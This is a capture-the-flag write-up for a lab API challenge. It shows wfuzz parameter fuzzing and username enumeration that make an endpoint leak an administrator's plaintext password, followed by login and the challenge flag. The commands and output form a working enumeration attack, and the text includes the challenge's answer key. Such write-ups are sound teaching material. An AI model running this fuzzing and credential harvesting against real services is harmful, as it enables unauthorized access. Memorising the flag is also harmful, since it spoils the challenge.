API (silver, 100p)

We found a nice target where some backend API communication is happening behind the scenes at https://10.XX.32.95:1006/.
Sometimes it is possible to extract valuable information by tampering some parameters.
Some dictionary attack may be used against index.php script and it seems that a web proxy is best tool for this job.
Can you reverse engineer messages and extract some information from this endpoint?

solution

Opening webpage returns API error. 

Backend API Error, empty request OR name not set

Based on challenge description, parameters were fuzzed. Nothing came from GET fuzzing, but POST fuzzing popped user parameter. 

$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -X POST --hh 48 https://10.XX.32.95:1006/?FUZZ=test
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://10.XX.32.95:1006/?FUZZ=test
Total requests: 2588

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000015:   200        0 L      6 W        29 Ch       "user"

Total time: 3.204631
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 807.5812
$ curl -X POST -k https://10.XX.32.95:1006/?user=test
No user found with name: test

Fuzzing the user parameter, returns interesting data on administrator. 

$ wfuzz -c -z file,/usr/share/seclists/Usernames/top-usernames-shortlist.txt -X POST --hs 'No user found' https://10.XX.32.95:1006/?user=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://10.XX.32.95:1006/?user=FUZZ
Total requests: 17

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000009:   200        0 L      6 W        117 Ch      "administrator"

Total time: 0.426322
Processed Requests: 17
Filtered Requests: 16
Requests/sec.: 39.87594
$ curl -X POST -k https://10.XX.32.95:1006/?user=administrator
Username: administrator<br>Password: terminator008<br>UserID:   1<br>IP:        127.0.0.1<br>Documentroot:  /virtualadmin<br>

Opening /virtualadmin show a simple login form.

screenshot of VirtualAdmin

Logging in as administrator with password terminator008 returns flag. 

Flag: b5d7407c-1afb-42d6-aef4-40b94733aad9